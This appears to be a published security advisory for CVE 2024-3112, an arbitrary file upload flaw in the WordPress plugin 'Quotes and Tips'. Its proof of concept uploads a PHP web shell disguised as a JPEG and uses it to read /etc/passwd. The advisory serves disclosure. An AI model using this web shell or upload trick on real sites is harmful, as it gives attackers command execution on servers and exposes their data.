Quotes and Tips < 1.45 – Admin+ Arbitrary File Upload | CVE 2024-3112

Description

The plugin does not properly validate image files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)

Proof of Concept

1. As an admin, go to  http://example.com/wp-admin/edit.php?post_type=tips&page=quotes-and-tips.php
2. After entering content in one of the fields, click "Save Changes" and intercept the request with BurpSuite
3. Modify the `qtsndtps_custom_image` part in the POST request to read:

```
Content-Disposition: form-data; name="qtsndtps_custom_image"; filename="backdoor.php"
Content-Type: image/jpg

<?php system($_GET[0]); ?> 
```

4. Visit http://example.com/wp-content/uploads/quotes-and-tips-image/backdoor.php?0=cat%20/etc/passwd" to see the contets of "/etc/passwd" in the browser.